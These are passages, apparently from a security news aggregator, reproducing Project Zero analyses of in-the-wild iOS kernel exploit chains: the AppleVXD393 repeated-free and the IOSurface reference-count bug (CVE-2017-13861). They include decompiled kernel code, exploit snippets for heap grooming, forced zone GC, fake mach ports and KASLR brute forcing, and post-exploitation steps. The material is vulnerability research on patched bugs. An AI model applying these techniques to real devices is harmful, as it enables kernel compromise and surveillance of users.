  // if the flag at +0x2e5 is set; do the same thing for the structure at  // +0x2F8  if ( *(_BYTE *)(this + 0x2E5) )  {    bzero(tmp_buf, 0x68uLL);    memmove(tmp_buf, (const void *)(this + 0x2F8), 0x68uLL);    err = AppleVXD393UserClient::DeallocateMemory(this, tmp_buf);    if ( err )      SMDLog("AppleVXD393UserClient::DestroyDecoder error deallocating decrypt buffer ");  }
  // then clear the flag for the second deallocate  *(_BYTE *)(this + 0x2E5) = 0;
This could still all be fine, depending on what ::DeallocateMemory actually does:

kern_return_tAppleVXD393UserClient::DeallocateMemory(__int64 this, __int64 tmp_buf){  // reading this+0x290 for the first case  VXD_desc = *(VXD_DEALLOC **)(tmp_buf + 0x20);  if ( !VXD_desc )    return 0LL;
  err = AppleVXD393::deallocateKernelMemory(*(_QWORD *)(this + 0xD8),                                            *(_QWORD *)(tmp_buf + 0x20));
  // unlink the buffer descriptor from a doubly-linked list:  prev = VXD_desc->prev;  if ( prev )    prev->next = VXD_desc->next;  next = VXD_desc->next;  if ( next )    v7 = &next->prev;  else    v7 = (VXD_DEALLOC **)(this + 0x268); // head  *v7 = prev;  IOFree(VXD_desc, 0x38LL);  return err;}

__int64 __fastcall AppleVXD393::deallocateKernelMemory(__int64 this, VXD_DEALLOC *VXD_desc){  __int64 err; // x19
  lck_mtx_lock(*(_QWORD *)(this + 0xD8));  err = AppleVXD393::deallocateKernelMemoryInternal((AppleVXD393 *)this, VXD_desc);  *(_DWORD *)(this + 0x2628) = 1;  lck_mtx_unlock(*(_QWORD *)(this + 0xD8));  return err;}
AppleVXD393::deallocateKernelMemoryInternal(AppleVXD393 *this, VXD_DEALLOC *VXD_desc) {  if ( !VXD_desc->iomemdesc ) {    SMDLog("AppleVXD393::deallocateKernelMemory pKernelMemInfo->xfer NULL\n");    return 0xE00002C2;  }...}
In a slightly obfuscated way this is reading a pointer from the VXDUserClient object which points to a 0x38-byte structure which I've tried to recreate here:

0x38 byte struct structure {// virtual method will be called if size_in_pages non-zero+0  = IOMemoryDescriptor ptr// virtual release method will be called if non-zero+8  = another OS_object+10 = unk+18 = size_in_pages+20 = maptype+28 = prev_ptr+30 = next_ptr}
A pointer to such a structure gets passed to AppleVXD393::deallocateKernelMemory, which in turn calls AppleVXD393::deallocateKernelMemoryInternal. If the first member (which is supposed to be an IOMemoryDescriptor pointer) is NULL, then this will just return. Then in AppleVXD393UserClient::DeallocateMemory the structure will be unlinked from a doubly-linked list (with a notable lack of safe unlinking), before being free'd via IOFree.

Nothing ever clears out the pointer at +0x290 in the VXDUserClient, which is the pointer to this 0x38 byte structure. So if the external method is called multiple times the same pointer will be passed to ::deallocateKernelMemory and then IOFree each time. This is the vulnerability which the exploit targets.
Kernel ExploitationNote that there are some restrictions on triggering the repeated free safely; specifically if the first pointer value isn't NULL and the size_in_pages field is non-zero, then a virtual method will be called on the IOMemoryDescriptor.
Also the entry will be unlinked from a list each time it's deallocated, so the prev and next pointers need to be set appropriately to survive that. (NULL is an appropriate, safe value.)

The attackers begin as usual by increasing the open file descriptor limit and creating 0x800 pipes. They also allocate 1024 early ports and an IOSurface. This time the IOSurface will be used as it was in iOS Exploit Chain 1 as a way to groom OSObjects.

They allocate four mach ports (receive one through four) then force a zone GC.
defeating mach_zone_force_gc removal mitigationApple completely removed the mach_zone_force_gc host port MIG method so there is now no direct way to immediately force a zone GC.
Zone GCs are still a required feature however; one just has to get a bit more creative. Zone GCs will still occur under memory pressure, so to cause a zone GC, just cause memory pressure. Here's how they do it:

#define ROUND_DOWN_NEAREST_1MB_BOUNDARY(val) ((val >> 20) << 20)
void force_GC(){
  long page_size = sysconf(_SC_PAGESIZE);  target_page_cnt = n_actually_free_pages();
  size_t fifty_mb = 1024*1024*50;
  size_t bytes_size = (target_page_cnt * page_size) + fifty_mb;  bytes_size = ROUND_DOWN_NEAREST_1MB_BOUNDARY(bytes_target)
  char* base = mmap(0,                    bytes_size,                    PROT_READ | PROT_WRITE,                    MAP_ANON | MAP_PRIVATE,                    -1,                    0);  if (!base || base == -1) {    return;  }
  for (i = 0; i < bytes_size / page_size; ++i ) {     // touch each page    base[page_size * i] = i;  }  n_actually_free_pages();
  // wait for GC...  sleep(1);
  // remove memory pressure  munmap(base, bytes_target);}

uint32_t n_actually_free_pages(){  struct vm_statistics64 stats = {0};  mach_msg_number_t statsCnt = HOST_VM_INFO64_COUNT;
  host_statistics64(mach_host_self(),                    HOST_VM_INFO64,                    &stats,                    &statsCnt);
  return (stats.free_count - stats.speculative_count);}
This is significantly slower than the previous version, but does work. They will continue to use this method for the remaining chains.
Heap groomingTo the fourth port they send two kalloc_groomer messages using the familiar functions; one making 0x20000 kalloc(0x38) calls and one making 0x2000 4k kallocs. These are filling in any holes in the heap to ensure subsequent allocations from those zones are more likely to come from fresh pages.
They perform a mach port groom allocating 10240 before_ports, a target port then 5120 after_ports. This sets up a situation similar to the IOSurface exploit in iOS Exploit Chain 2, where they have a single target port in the middle of a large number of other port allocations all owned by the exploit process:

They send the target port in an out-of-line ports descriptor to third port; stashing a reference there (meaning target_port now has a reference count of 2.) This is again similar to the technique used in the IOSurface exploit.

They call external method 0 on the userclient. This is CreateDecoder, which will cause the allocation of the 0x38 byte target buffer, storing the pointer in the userclient at +0x290.

They then call external method 1, DestroyDecoder. This kfree's the 0x38 byte structure which was just allocated, but doesn't NULL out the pointer to it in the userclient at +0x290.

They use the IOSurface property trick to deserialize an OSArray of 0x400 OSData objects, where each OSData object is a 0x38-byte buffer of zeros. It's attached to the IOSurfaceRootUserClient with the key "spray_56" (where 56 is 0x38 in decimal, the size of the target allocation.)

The idea here is that one of those OSData object's backing buffers was allocated over the free'd 0x38-byte structure allocation which the UserClient still has a dangling pointer to. Since they set the contents to NULL, it will survive being destroyed by the userclient again, which is exactly what happens when they call DestroyDecoder a second time:

IOConnectCallStructMethod(         userclient_connection,         1LL, // AppleVXD393UserClient::DestroyDecoder              // free one of the OSData objects         IOConnect_struct_in_buf,         struct_in_size,         IOConnect_struct_out_buf,         &struct_out_size);

At this point both the VXD393UserClient and the OSData object have dangling pointers to a free'd allocation. They reallocate the buffer for a second time, but this time with something different:

// send 7 ports; will result in a 0x38 byte kalloc allocbzero(ool_ports_desc, 28LL);ool_ports_desc[1] = target_port;send_a_mach_message_with_ool_ports_descs(    second_receive,    ool_ports_desc,    7,    0x190);
This time they're sending a mach message with 0x190 OOL_PORTS descriptors, each with 7 port names, all of which are MACH_PORT_NULL apart from the second one. As we saw in the IOSurface exploit, this will result in at 0x38 byte kalloc allocation (0x38 = 7*0x8) where the second qword is a pointer to target_port's struct ipc_port:

pointer disclosureHopefully one of those 0x190 out-of-line ports descriptors overlapped both the OSData backing buffer and the VXD393UserClient 0x38-byte structure buffer.

Now they read the contents of all the OSData buffers via the IOSurface read property method and look for a kernel pointer (remember, the contents of all of the OSData buffers were originally all zeros):

iosurface_get_property_wrapper(spray_56_str,                               big_buffer,                               &buffer_size_in_out);found_at = memmem(big_buffer, buffer_size_in_out, "\xFF\xFF\xFF", 3);
The "\xFF\xFF\xFF" signature will match the upper three bytes of a kernel pointer. The only kernel pointer which will have been serialized is the address of target_port, meaning they've successfully disclosed the kernel address of the target port.
Repeated free to extra port reference dropThey trigger the bug for a third time, leaving themselves with three dangling pointers: one in the userclient, one in an OSData object, and one in an out-of-line ports descriptor port pointer buffer in an in-transit mach message.
Note that it's still safe to trigger the bug as only the second qword is non-zero. The first pointer (an IOMemoryDescriptor*) is still NULL, so AppleVXD393::deallocateKernelMemoryInternal will return early, the list unlinking will succeed because both the prev and next pointers are NULL.
Third replacementThey serialize another array of OSData objects. This time they place two copies of the disclosed target port kernel address in the buffer before attaching them to the IOSurfaceUserClient again:

os_data_spray_buf_ptr[0] = target_port_kaddr;os_data_spray_buf_ptr[1] = target_port_kaddr;
serialize_array_of_data_buffers(&another_vec, os_data_spray_buf, 0x38u, 800);
What's going on there?

As we've seen in previous chains, each port pointer in an in-transit out-of-line ports descriptor holds a reference; you can see the logic for this in ipc_kmsg_copyin_ool_ports_descriptor in ipc_kmsg.c in the XNU source.

The "real" out-of-line ports descriptor buffer for the message which was sent only had one pointer to a port; so it only took one reference on the port. But they've now doubled-up that pointer; the descriptor buffer has two copies of it, but it only took one extra reference.

When the descriptor buffer is destroyed (for example, when the port to which it was sent is destroyed without the message being received) the kernel will iterate through each pointer in the descriptor and if it isn't NULL, it will drop a reference:

ipc_kmsg_clean_body(......  case MACH_MSG_OOL_PORTS_DESCRIPTOR : {    ipc_object_t* objects;    mach_msg_type_number_t j;    mach_msg_ool_ports_descriptor_t* dsc;                    dsc = (mach_msg_ool_ports_descriptor_t*)&saddr->ool_ports;    objects = (ipc_object_t *) dsc->address;                    if (dsc->count == 0) {      break;    }                 /* destroy port rights carried in the message */                    for (j = 0; j < dsc->count; j++) {      ipc_object_t object = objects[j];                          if (!IO_VALID(object))        continue;            // drop a reference      ipc_object_destroy(object, dsc->disposition);    }                    /* destroy memory carried in the message */    kfree(dsc->address, (vm_size_t) dsc->count * sizeof(mach_port_t));
That's exactly what happens next when they destroy the port to which the OOL_PORTS descriptors were sent:

  mach_port_destroy(mach_task_self(), second_receive);
This has the effect of dropping an extra reference on target_port, in this case leaving two pointers to target_port (one in the task's port name space table, one in the out-of-line ports descriptor sent to third_receive) but only one reference.

They've now recreated the same situation they had in the IOSurface exploit: about to give themselves a dangling mach port pointer, but from a quite different initial primitive. In that case the bug itself directly gave them a dangling pointer to a mach port structure; here they've recreated that same primitive starting from a repeated-free bug in a different zone; something quite different.

We'll now see that the rest of the code matches up very closely with the IOSurface exploit. This is an example of marginal costs; the cost to develop each additional exploit chain is lower than the cost for the first one. Many parts can be reused; mitigations must only be defeated once upon introduction (or new techniques developed if the mitigation was not in a critical path.)
Joining the chainsThe code from this point is almost completely copy-pasted from the IOSurface exploit.
They destroy the before_ports, third_receive (causing target_port to be freed) then after_ports and perform a GC with the new method. At this point, target_port is dangling, and the zone chunk it's in is ready to be reallocated by a different zone.

They attempt to replace with small out-of-line memory regions which will correspond to kalloc.4096 allocations, overlapping the ip_context field with a marker containing the loop iteration.

Each time through the loop they check whether the context field changed, meaning the ipc_port buffer was reallocated as the out-of-line memory descriptor backing buffer. They free the particular port to which the correct descriptor was sent, and try to reallocate with 0x800 pipe buffers, each filled with fake ports with a context value set to identify which fd the maps to.

Once this is identified they build a fake IKOT_CLOCK port and brute force the KASLR slide, then using the offsets they build their initial fake task port for a read.

They use a more optimized approach to build a fake kernel task this time; given the offset to the kernel_task pointer they use the bootstrap read to get a pointer to the kernel task, from which they read a pointer to the kernel task port and a pointer to the kernel's vm_map.

From the kernel task port they read the field at offset +0x60, which is the port's space, in this case itk_space_kernel.

This is all that's required to build a fake kernel task port and fake kernel task in the pipe buffer, giving them kernel memory read and write.
Post-exploitationThe post exploitation phase remains the same; patching the platform policy to allow execution from /tmp, adding the implant's CDHash to the kernel trust cache, replacing credentials to temporarily escape the sandbox and posix_spawn the implant as root, then switching back to the original credentials.
They place the string iop114 in the bootargs, which we saw that they read right at the start of the privilege escalation exploit to determine whether the exploit successfully ran already.
Appendix AList of unused but resolved symbolsasl_log_messagesel_registerNameCFArrayCreateMutableCFDataCreateCFArrayAppendValueCFDictionaryCreateCFDictionaryAddValueCFStringCreateWithFormatCFReleaseCFDataGetBytePtrCFDataGetLengthbootstrap_look_up2statusleepopenCFWriteStreamCreateWithFTPURLCFWriteStreamOpenCFWriteStreamWriteCFWriteStreamCloseunlinksprintfstrcatcopyfileremovefiletask_suspendtask_name_for_pidmach_port_mod_refspthread_createpthread_join_IOHIDCreateBinaryDataio_hideventsystem_openmlockmig_get_reply_portmach_vm_read_overwritemach_ports_lookupvm_allocatemach_port_kobjectIOMasterPortkCFTypeArrayCallBacks
There's some interesting stuff in here. It's of course impossible to know definitively if these were left over from development, or actually used in early exploits using this second framework. But the following two chains (iOS Exploit Chains 4 and 5) use this same symbol list, adding only the symbols they require.

The following symbols seem interesting; it's possible that these symbols were also used in ROP stacks in sandbox escapes as well.

mlock points to two possible things; it's been used in the past to ensure userspace pages don't get swapped while triggering a userspace dereference. mlock has also been involved in codesigning bypasses, potentially it was used in a ROP chain to bootstrap shellcode execution.
This kernel MIG method is discussed at length in Stefen Esser's blog post mach_port_kobject() and the kernel address obfuscation. Until iOS 6 it would return the ip_kobject field of the provided mach port. In iOS 6 some obfuscation was added to the returned pointer but as Stefen pointed out it was easy to break.
There have been many bugs in HID drivers and also in the hideventsystem service itself. See for an exploit. Potentially this is related to IOHIDCreateBinaryData which they also import.
Kategorie: Hacking & Security

In-the-wild iOS Exploit Chain 2

30 Srpen, 2019 - 02:04
Posted by Ian Beer, Project Zero


This was an exploit for a known bug class which I had been auditing for since late 2016. The same anti-pattern which lead to this vulnerability, we’ll see again in Exploit Chain #3, which follows this post.  

This exploit chain targets iOS 10.3 through 10.3.3. Interestingly, I also independently discovered and reported this vulnerability to Apple, and it was fixed in iOS 11.2. 

This also demonstrates that Project Zero’s work does collide with bugs being exploited in the wild.In-the-wild iOS Exploit Chain 2 - IOSurfacetargets: 5s through 7, 10.3 through 10.3.3 (vulnerability patched in 11.2)

iPhone6,1 (5s, N51AP)iPhone6,2 (5s, N53AP)iPhone7,1 (6 plus, N56AP)iPhone7,2 (6, N61AP)iPhone8,1 (6s, N71AP)iPhone8,2 (6s plus, N66AP)iPhone8,4 (SE, N69AP)iPhone9,1 (7, D10AP)iPhone9,2 (7 plus, D11AP)iPhone9,3 (7, D101AP)iPhone9,4 (7 plus, D111AP)
versions: (dates are release dates)

14E277 (10.3 - 27 Mar 2017)
14E304 (10.3.1 - 3 Apr 2017)14F89 (10.3.2 - 15 May 2017)14G60 (10.3.3 - 19 Jul 2017) <last version of iOS 10>
first unsupported version: 11.0 19 sep 2017

This bug wasn't patched until iOS 11.2, but they only supported iOS 10.3-10.3.3 (the last version of iOS 10.) For iOS 11 they moved to a new chain.
The kernel vulnerability The kernel bug used here is CVE-2017-13861; a bug collision with Project Zero issue 1417, aka async_wake. I independently discovered this vulnerability and reported it to Apple on October 30th 2017. The attackers appears to have ceased using this bug prior to me finding it; the first unsupported version is iOS 11, released 19 September 2017. The bug wasn't fixed until iOS 11.2 however (released December 2nd 2017.)

The release of iOS 11 would have broken one of the exploitation techniques used by this exploit; specifically in iOS 11 the mach_zone_force_gc() kernel MIG method was removed. It's unclear why they moved to a completely new chain for iOS 11 (with a new trick for forcing GC after the removal of the method) rather than updating this chain. The vulnerabilityWe saw in the first chain that IOKit external methods can be called via the IOConnectCallMethod function. There's another function you can call instead: IOConnectCallAsyncMethod, which takes an extra mach port and reference argument:

kern_return_tIOConnectCallMethod(mach_port_t     connection,                     uint32_t        selector,                    const uint64_t* input,                    uint32_t        inputCnt,                    const void*     inputStruct,                    size_t          inputStructCnt,                    uint64_t*       output,                    uint32_t*       outputCnt,                    void*           outputStruct,                    size_t*         outputStructCnt);

kern_return_tIOConnectCallAsyncMethod(mach_port_t     connection,                         uint32_t        selector,                         mach_port_t     wake_port,                         uint64_t*       reference,                         uint32_t        referenceCnt,                         const uint64_t* input,                         uint32_t        inputCnt,                         const void*     inputStruct,                         size_t          inputStructCnt,                         uint64_t*       output,                         uint32_t*       outputCnt,                         void*           outputStruct,                         size_t*         outputStructCnt);
The intention is to allow drivers to send a notification message to the supplied mach port when an operation is completed (hence the "Async"(hronous) in the name.)

Since IOConnectCallAsyncMethod is a MIG method the lifetime of the wake_port argument will be subject to MIG's lifetime rules for mach ports.

MIG takes a reference on wake_port and calls the implementation of the MIG method (which will then call in to the IOKit driver's matching external method implementation.) The return value from the external method will be propagated up to the MIG level where the following rule will be applied:

If the return code is non-zero, indicating an error, then MIG will drop the reference it took on the wake_port. If the return code is zero, indicating success, then MIG will not drop the reference it took on wake_port, meaning the reference was transferred to the external method.

The bug was that IOSurfaceRootUserClient external method 17 (s_set_surface_notify) would drop a reference on the wake_port then also return an error code if the client had previously registered a port with the same reference value. MIG would see that error code and drop a second reference on the wake_port when only one reference was taken. This lead to the reference count being out-of-sync with the number of pointers to the port, leading to a use-after-free.

Again, this is directly reachable from inside the MobileSafari renderer sandbox due to this line in the sandbox profile:

(allow iokit-open       (iokit-user-client-class "IOSurfaceRootUserClient")SetupThis exploit also relies on the system loader to resolve symbols. It uses the same code as Exploit Chain #1 to terminate all other threads in the current task. Before continuing on however, this exploit first tries to detect whether this device has already been exploited. It reads the kern.bootargs sysctl variable, and if the bootargs contains the string "iop1" then the thread goes into an infinite loop. At the end of the exploit we'll see them using the kernel memory read/write primitive they build to add the "iop1" string to the bootargs.

They use the same serialized NSDictionary technique to check whether this device and kernel version combo is supported and get the necessary offsets.ExploitationThey call setrlimit with the RLIMIT_NOFILE resource parameter to increase the open file limit to 0x2000. They then create 0x800 pipes, saving the read and write end file descriptors. Note that by default iOS has a low default limit for the number of open file descriptors, hence the call to setrlimit.
They create an IOSurfaceRootUserClient connection; this time just used to trigger the bug rather than for storing property objects.

They call mach_zone_force_gc(), indicating that their initial resource setup is complete and they're going to start the heap groom.
Kernel Zone allocator garbage collectionThis exploit introduces a new technique involving the mach_zone_force_gc host port method. In the first chain we saw the use of the kernel kalloc function for allocating kernel heap memory. The word heap is used here with its generic meaning of as "area used for scratch memory"; it has nothing to do with the classical heap data structure. The memory returned by kalloc is actually from a zone allocator called zalloc.

The kernel reserves a fixed-size region of its virtual address space for the kernel zone allocator and defines a number of named zones. The virtual memory region is then split up into chunks as zones grow based on dynamic memory allocation patterns. All zones return allocations of fixed sizes.

The kalloc function is a wrapper around a number of general-purpose fixed-sized zones such as kalloc.512, kalloc.6144 and so on. The kalloc wrapper function chooses the smallest kalloc.XXX zone size which will fit the requested allocation, then asks the zone allocator to return a new allocation from that zone. In addition to kalloc zones, many kernel subsystems also define their own special purpose zones. The kernel structures representing mach ports for example are always allocated from their own zone called ipc.ports. This is not intended to be a security mitigation (ala PartitionAlloc or GigaCage) but it does mean that an attacker has to take a few extra steps to build generic use-after-free exploits. 

Over time zalloc zones can become fragmented. When there's memory pressure the zone allocator can perform a garbage collection. This has nothing to do with garbage collection in managed languages like java; the meaning here is much simpler: a zone GC operation involves finding zone chunks which consist of completely free allocations. Such chunks are removed from the particular zone (eg kalloc.4096) and made available to all zones again.

Prior to iOS 11 it was possible to force such a zone garbage collection to occur by calling the mach_zone_force_gc() host port MIG method. Forcing a zone GC is a very useful primitive as it enables the exploitation of a bug involving objects from one zone to using objects from another. This technique will be used in all subsequent kernel exploits we'll look at.

Let's return to the exploit. They allocate two sets of ports:

  Set 1: 1200 ports  Set 2: 1024 ports
As we saw in the first chain, they're going to make use of mach message out-of-line memory descriptors for heap grooming. They make minor changes to the function itself but the principle remains the same, to make controlled-size kalloc allocations, the lifetimes of which are tied to particular mach ports. They call send_kalloc_reserver:

  send_kalloc_reserver(v124, 4096, 0, 2560, 1);
This sends a mach message to port v124 with 2560 out-of-line descriptors, each of which causes a kalloc.4096 zone allocation. The contents of the memory aren't important here, initially they're just trying to fill in any holes in the kalloc.4096 zone.Port groomWe've seen that the vulnerability involves mach ports, so we expect to see some heap grooming involving mach ports, which is what happens next. They allocate four more large groups of ports which I've named ports_3, ports_4, ports_5 and ports_6:

They allocate 10240 ports for the ports_3 group in a tight loop, then allocate a single mach port which we'll call target_port_1. They then allocate another 5120 ports for ports_4 in a second loop.

They're trying to force a heap layout like the following, where target_port_1 lies in an ipc_ports zone chunk where all the other ports in the chunk are from either ports_3 or ports_4. Note that due to the zone freelist mitigation introduced in iOS 9.2 there may be ports from both ports_3 and ports_4 before and after target_port_1:

They perform this same groom again, now with ports_5, then target_port_2, then ports_6:

They send a send right to target_port_1 in an out-of-line ports descriptor in a mach message. Out-of-line ports, like out-of-line memory regions, will crop up again and again so it's worth looking at them in detail.Heap grooming technique: out of line portsThe descriptor structure used in a mach message for sending out-of-line ports is very similar to the structure used for sending out-of-line memory:

typedef struct {  void*                      address;  boolean_t                  deallocate: 8;  mach_msg_copy_options_t    copy: 8;  mach_msg_type_name_t       disposition : 8;  mach_msg_descriptor_type_t type : 8;  mach_msg_size_t            count;} mach_msg_ool_ports_descriptor_t;
The address field is again a pointer to a buffer, but this time rather than a size field there's a count field which specifies the number of mach port names contained in the buffer. When the kernel processes this descriptor (in the function ipc_kmsg_copyin_ool_ports_descriptor in ipc_kmsg.c) it will look up each of the names in the out-of-line ports buffer, take a reference on the underlying ipc_port structure and place that reference-carrying pointer in a kalloc'ed kernel buffer which reflects the layout of the out-of-line ports buffer. Since a port name in userspace is 32-bits and the iOS kernel is 64-bit (at least for all devices supported by this exploit) the size of the kalloc kernel buffer will be double the size of the out-of-line ports descriptor (since each 32-bit name will become a 64-bit pointer.)

They then call external method 17 (s_set_surface_notify) once, passing target_port_1 as the wake_port argument.

Understanding reference counting bugs means matching up references with pointers and understanding their lifetimes. To work out what's going on here we need to enumerate all the pointers to the target port and see what's holding references. Here's a diagram showing the three reference-holding pointers to target_port_1 at this point:

At this point there are three reference-holding pointers to target_port_1:
  • Pointer A is the entry in the renderer process's mach port names table (task->itk_space->it_table.)
  • Pointer B is in the out-of-line ports buffer of the message which is currently in transit. Note that the exploit sent this message to a port for which it owns the receive right, meaning that it can still receive this right by receiving the message.
  • Pointer C is held by the IOSurfaceRootUserClient. There's no bug the first time the s_set_surface_notify external method is called, so the userclient does correctly hold one reference for the one pointer it has.
Triggering the bugThey then call external method 17 again with the same arguments. As discussed earlier, this will cause an extra reference to be dropped on target_port_1, meaning there will still be three reference-holding pointers A, B and C but the io_references field of target_port_1 will be 2.

They then destroy the userclient, which drops its reference on target_port_1.

This means pointer C and one reference are gone, leaving pointers A and B and a reference count of one. The attackers then proceed as follows:

They destroy all the ports in ports_3:
Then they destroy the port to which the message with the out-of-line ports descriptor was sent. Since this will also destroy all the messages enqueued in the port's message queue, this will destroy pointer B and drop one more reference:
The reference count will go from one to zero, meaning that the target_port_1 allocation will be freed back to the ipc_ports zone. But pointer A can still be used, and will now point to a free'd allocation in the ipc_ports zone chunk.
Finally they destroy ports_4, hopefully leaving the entire chunk which contained target_port_1 empty (but with pointer A still usable as a dangling ipc_port pointer.) 
At this point the the zone chunk previously containing target_port_1 should be completely empty and the mach_zone_force_gc() MIG method is called to reclaim the pages; making them available to be reused by all zones.
Note here that the exploit is making the assumption that only ports from ports_3, target_port_1 and ports_4 fill the target ipc_ports zone chunk. If that's not the case, because for example another task allocated a port while the exploit was trying to fill ports_3 and ports_4, then the exploit will fail because the chunk will not be garbage collected by mach_zone_force_gc(). target_port_1 will therefore continue to point to free'd ipc_port, most likely leading to a kernel panic later on.

The exploit will now try to perform a "zone transfer" operation, aiming to get the memory which the dangling pointer A points to in to a different zone. Specifically, they are going to target kalloc.4096. This explains why they made a large number of kalloc.4096 allocations earlier (to fill in any holes in the zone.)

They send a large number of mach messages with out-of-line ports descriptors to some of the ports they allocated at the start of the exploit.

The descriptors each have 512 port names, meaning the kernel will allocate a 4096 byte buffer (512 ports * 8 bytes per pointer) and the port names alternate between MACH_PORT_NULL and target_port_2 in such a way that the address of target_port_2 will overlap with the ip_context fields of the dangling ipc_port.

This is a (now) well known technique for creating fake kernel objects from out-of-line ports descriptors.

They send a very large number of these descriptors; hoping that one of them will replace the memory previously occupied by target_port_1. They then try to read the context value of the dangling target_port_1 (which will use pointer A.)

  mach_port_get_context(mach_task_self(), port_to_test, &context_val);
This works because the kernel code for mach_port_get_context is very simple; it doesn't take a reference on the port, only holds a lock, reads the ip_context field and returns. So it can work even with the very sparsely populated replacement objects built from out-of-line ports descriptors.

If the memory which used to contain target_port_1 did get replaced by one of the out-of-line ports descriptors, then the value read by mach_port_get_context will be a pointer to target_port_2, meaning they have disclosed where target_pointer_2 is in memory.

One of the requirements for each of the remaining exploits in the chain is to have known data at a known location; they have now solved this problem for this chain.Rinse and repeatNow they know where target_port_2 is in memory, they trigger the vulnerability a second time to get a second dangling port pointer, this time to target_port_2.

They start by destroying all the ports to which the replacer out-of-line ports descriptors were sent, which frees them all to the kalloc.4096 freelist. They then quickly make 12800 kalloc.4096 allocations via out-of-line memory descriptors so that the memory which target_port_1 points to doesn't get reused for an uncontrolled allocation.

They now perform the same operation as before to get a dangling pointer to target_port_2: sending it to themselves in an out-of-line ports descriptor, triggering the bug via IOSurfaceRootUserClient external method 17 then closing the userclient and destroying the surrounding ports (this time the ports_5 and ports_6 arrays.)

The second time around however they use a different replacement object; now they're trying to replace with out-of-line memory descriptors rather than out-of-line ports.

char replacer_buf[4096] = {0};
do {  loop_iter = 0;  for (int nn = 0; nn < 20; nn++) {    build_replacer_ool_mem_region(replacer_buf,                                  (loop_iter << 12) + (port_context_tag << 32));    send_kalloc_reserver(second_ports[loop_iter++],                         4096,                         &replacer_buf[24],                         1024, // 4MB each message                         1);  }  mach_port_get_context(mach_task_self(),                        second_target_port,                        &raw_addr_of_second_target_port);} while(HIDWORD(raw_addr_of_second_target_port) != port_context_tag );

voidbuild_replacer_ool_mem_region(char* buf,                              uint64_t context_val){  offset = 0x90; // initial value is offset of ip_context field  for (int i = 0; i < constant_based_on_memsize; i++) {    *(uint64_t*)(buf + (offset & 0xfff)) = context_val + (offset & 0xFFF);    offset += 0xA8; // sizeof(struct ipc_port);  }}
They are trying to fill with fake ports in out-of-line memory descriptors; again only focusing on the context field. This time they pack three separate values in to the fake context field:

0-11: offset of this context field in the replacer page12-31: loop_iteration (index into second_ports array for the port to which the kalloc_replacer was sent)32-63: 0x1122 - a magic value to detect whether this is a replaced port
Each time through the loop they make 20480 kalloc.4096 allocations, hoping that one of them replaces the memory which previously contained target_port_2. They read the context value of target_port_2 via mach_port_get_context() and check whether the upper 32-bits match the 0x1122 magic value.

From the context value they know to which of the second_ports the kalloc replacer message which overlaps target_port_2 was sent and from bits 12-31 they also know the offset on the page of the replacer port.

They free the port to which the kalloc replacer was sent, which will also free another 1023 kalloc.4096 allocations which didn't overlap.

Yet again there is another window here where a different process on the system could reallocate the target memory buffer, causing the exploit to crash.pipesNow in a loop they write a 4095 byte buffer to the write ends of the 0x800 pipes which were allocated earlier. The pipe code will make a kalloc.4096 allocation to hold the contents of the pipe. This may not seem any different to replacing with the mach message out-of-line memory buffers, but there's a fundamental difference: the pipe buffer is mutable. By reading the complete contents of the pipe buffer (emptying the pipe) and then writing the exact same amount of replacement bytes back (refilling the pipe buffer) it's possible to change the contents of the backing kalloc allocation without it being free'd and reallocated, as would be the case with mach message OOL memory buffers.

You might ask, why not just directly replace with pipes, rather than first OOL memory, then pipes? The reason is that pipe backing buffers have their own relatively low allocation size limits (16MB) whereas in-transit OOL memory is only limited by available zone allocator memory. As the attackers refine their exploit chain in later posts, they will actually remove the intermediate OOL step.

They use the same function as before to build the contents of the pipe buffer which will replace the port, but use a different tag magic value, and set bits 12-31 to be the index of the pipe in the pipe_fd's array:

  replacer_pipe_index = 0;  for (int i1 = 0; i1 < *n_pipes; i1++) {    build_replacer_ool_mem_region(replacer_buf,                                  (i1 << 12) + (port_context_tag << 33));    write(pipe_fds[2 * i1 + 1], replacer_buf, 0xFFF);  }
They read the ip_context value via mach_port_get_context from the second dangling port again and check that the context matches the new pipe replacer context. If it does, they've now succeeded in creating a fake ipc_port which is backed by a mutable pipe buffer. 
Defeating KASLR via clock_sleep_trapIn the same slide deck where Stefen Esser discusses the OOL ports descriptor technique he also discusses a technique to brute-force KASLR using fake mach ports. This trick was also used in the yalu102 jailbreak.

Here's the code for clock_sleep_trap. This is a mach trap, the mach equivalent of a BSD syscall.

/* * Sleep on a clock. System trap. User-level libmach clock_sleep * interface call takes a mach_timespec_t sleep_time argument which it * converts to sleep_sec and sleep_nsec arguments which are then * passed to clock_sleep_trap. */kern_return_tclock_sleep_trap(  struct clock_sleep_trap_args *args){  mach_port_name_t clock_name        = args->clock_name;  sleep_type_t sleep_type            = args->sleep_type;  int sleep_sec                      = args->sleep_sec;  int sleep_nsec                     = args->sleep_nsec;  mach_vm_address_t wakeup_time_addr = args->wakeup_time;    clock_t clock;  mach_timespec_t swtime             = {};  kern_return_t rvalue;
  /*   * Convert the trap parameters.   */  if (clock_name == MACH_PORT_NULL)    clock = &clock_list[SYSTEM_CLOCK];  else    clock = port_name_to_clock(clock_name);
  swtime.tv_sec  = sleep_sec;  swtime.tv_nsec = sleep_nsec;
  /*   * Call the actual clock_sleep routine.   */  rvalue = clock_sleep_internal(clock, sleep_type, &swtime);
  /*   * Return current time as wakeup time.   */  if (rvalue != KERN_INVALID_ARGUMENT && rvalue != KERN_FAILURE) {    copyout((char *)&swtime, wakeup_time_addr, sizeof(mach_timespec_t));  }  return (rvalue);}

clock_tport_name_to_clock(mach_port_name_t clock_name){  clock_t     clock = CLOCK_NULL;  ipc_space_t space;  ipc_port_t port;
  if (clock_name == 0)    return (clock);  space = current_space();  if (ipc_port_translate_send(space, clock_name, &port) != KERN_SUCCESS)    return (clock);  if (ip_active(port) && (ip_kotype(port) == IKOT_CLOCK))    clock = (clock_t) port->ip_kobject;  ip_unlock(port);  return (clock);}

static kern_return_tclock_sleep_internal(clock_t clock,                     sleep_type_t sleep_type,                     mach_timespec_t* sleep_time){  ...  if (clock == CLOCK_NULL)    return (KERN_INVALID_ARGUMENT);
  if (clock != &clock_list[SYSTEM_CLOCK])    return (KERN_FAILURE);  ...

/* * List of clock devices. */SECURITY_READ_ONLY_LATE(struct clock) clock_list[] = {
  /* SYSTEM_CLOCK */  { &sysclk_ops, 0, 0 },
  /* CALENDAR_CLOCK */  { &calend_ops, 0, 0 }};
